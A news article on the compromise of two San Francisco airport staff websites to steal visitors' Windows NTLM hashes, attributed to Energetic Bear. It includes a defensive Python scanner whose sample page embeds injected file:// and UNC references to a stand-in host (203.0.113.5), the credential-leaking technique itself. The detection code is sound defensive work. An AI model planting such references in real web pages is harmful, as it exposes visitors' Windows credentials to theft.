Two San Francisco airport sites compromised to steal staff passwords; a Russian group possibly behind the operation

The management of San Francisco International Airport confirmed that two of its websites were compromised in March as part of a criminal operation aimed at stealing the passwords and access credentials of staff and contractors.

The airport confirmed the breach in a statement issued on April 7, saying that the sites SFOConnect.com and SFOConstruction.com were "cyberattack targets" in which hackers "inserted malicious code to steal some users' credentials". Those credentials, if misused, would allow access to the airport network.

The statement also reads: "Users who may have been affected by this attack include those who access sites from a system outside the airport network via Internet Explorer or through a personal Windows-based device, or from a device not managed by the airport."

The airport took the two websites, which are reserved for staff, offline and ordered a mandatory password reset on 23 March. The sites are now fully operational. It is not currently known whether additional security measures, such as multi-factor authentication, were in place to prevent a network breach.

An old acquaintance returns to the scene: DragonFly, now Energetic Bear

The security company ESET stated that the target of the operation was not the credentials for the two compromised websites themselves, but the Windows credentials of the sites' visitors. "The aim was to collect visitors' Windows credentials (username / NTLM hash) using an SMB feature and the file:// prefix," says ESET.

NTLM hashes can be easily cracked to recover the plaintext version of a user's Windows password. With possible access to the airport's internal network, the attackers could then have used employee credentials to move laterally across the network and carry out activities ranging from information theft to sabotage.
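The technique ESET describes, and the lateral-movement risk that follows from it, suggest two defensive checks: scanning served pages for resource references that point at `file://` or UNC (`\\host\share`) locations, which a Windows browser may try to fetch over SMB while authenticating, and reviewing egress logs for outbound SMB (TCP 445) to addresses outside the organisation, since that is the path by which the NTLM exchange would leave the network. The following is an added example written for this article; it is not code from the airport, ESET or Kaspersky. The page content, log format, hostnames and IP addresses (TEST-NET ranges) are constructed, and the list of internal networks is an assumption standing in for an organisation's real address plan.

```python
"""
Defensive checks for injected file:// / UNC resource references and for
outbound SMB egress. Sample HTML and log lines below are constructed for
the example; the IPs are TEST-NET addresses, not real infrastructure.
"""
from html.parser import HTMLParser
import ipaddress
import re

# Attributes that cause a browser to fetch a resource automatically.
RESOURCE_ATTRS = {"src", "href", "data", "poster", "action", "background"}


def is_unc_or_file(value):
    """True if a URL/path would make Windows reach out over SMB."""
    v = value.strip().lower()
    return v.startswith("file:") or v.startswith("\\\\")


class FileRefScanner(HTMLParser):
    """Collects (tag, attribute, value) for suspicious resource references."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and name.lower() in RESOURCE_ATTRS and is_unc_or_file(value):
                self.findings.append((tag, name, value))


def scan_html(page):
    scanner = FileRefScanner()
    scanner.feed(page)
    return scanner.findings


# Assumed internal address plan (RFC 1918); adjust to the real environment.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Assumed key=value firewall log format for the constructed sample below.
LOG_RE = re.compile(r"src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)")


def flag_external_smb(log_lines):
    """Return (src, dst) pairs for SMB connections leaving the internal nets."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m or int(m["dport"]) != 445:
            continue
        dst = ipaddress.ip_address(m["dst"])
        if not any(dst in net for net in INTERNAL_NETS):
            hits.append((m["src"], m["dst"]))
    return hits


# Constructed sample page: two injected references among legitimate ones.
INJECTED_PAGE = """<html><body>
<h1>Contractor portal</h1>
<img src="/static/logo.png" alt="logo">
<img src="file://203.0.113.5/share/pixel.png" width="1" height="1">
<link rel="stylesheet" href="\\\\203.0.113.5\\share\\style.css">
<script src="https://cdn.example.invalid/app.js"></script>
</body></html>"""

CLEAN_PAGE = """<html><body><img src="/static/logo.png"></body></html>"""

# Constructed firewall log: one internal SMB flow, one external SMB flow, one HTTPS.
SAMPLE_LOG = [
    "2020-03-20T10:01:02Z src=10.20.30.40 dst=10.20.30.1 dport=445 proto=tcp action=allow",
    "2020-03-20T10:01:03Z src=10.20.30.40 dst=203.0.113.5 dport=445 proto=tcp action=allow",
    "2020-03-20T10:01:04Z src=10.20.30.41 dst=203.0.113.9 dport=443 proto=tcp action=allow",
]

if __name__ == "__main__":
    for tag, attr, value in scan_html(INJECTED_PAGE):
        print(f"suspicious reference: <{tag} {attr}={value!r}>")
    for src, dst in flag_external_smb(SAMPLE_LOG):
        print(f"external SMB egress: {src} -> {dst}:445")
```

Both findings are worth acting on separately: the HTML scan catches the injection where it lives, while the egress check catches the credential leak in flight and also documents whether outbound 445 is blocked at the perimeter at all, which is the usual mitigation for this class of attack.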

ESET also attributes the attacks to an old acquaintance, a threat actor known as Energetic Bear (also called DragonFly), a group active since 2010 and believed to work for the Russian government. It is a particularly active collective which over the last ten years has targeted organisations around the world, focusing in particular on the energy sector (hence the name) in the Middle East, the USA and Turkey.

More recently, as Kaspersky also observed in 2018, Energetic Bear appears to have shifted its targeting towards companies in the aerospace and aviation sector. Kaspersky had also noted that the group had already used the same technique to obtain the NTLM hashes of visitors to a compromised website.

On the hunt for personal data, for targeted malware campaigns and identity theft

What happened is unfortunately a fairly widespread practice among criminals operating on the web: particularly attractive targets are those that yield a large volume of sensitive information on individuals, possibly including credit card numbers along with personal and contact data. Large archives of such information can then be resold on the dark web or used to launch targeted malware campaigns or to attempt identity theft for various purposes.

On a related note, the Marriott hotel chain recently suffered an incident that led to the theft of 5 million customers' data. Staying in the field of civil aviation, it is worth recalling the breach suffered by British Airways in 2018, with the theft of approximately 500 thousand customer credit card numbers. That incident cost the airline a fine of over 200 million euros (the largest ever imposed in Europe for a data breach) under the then new GDPR rules.
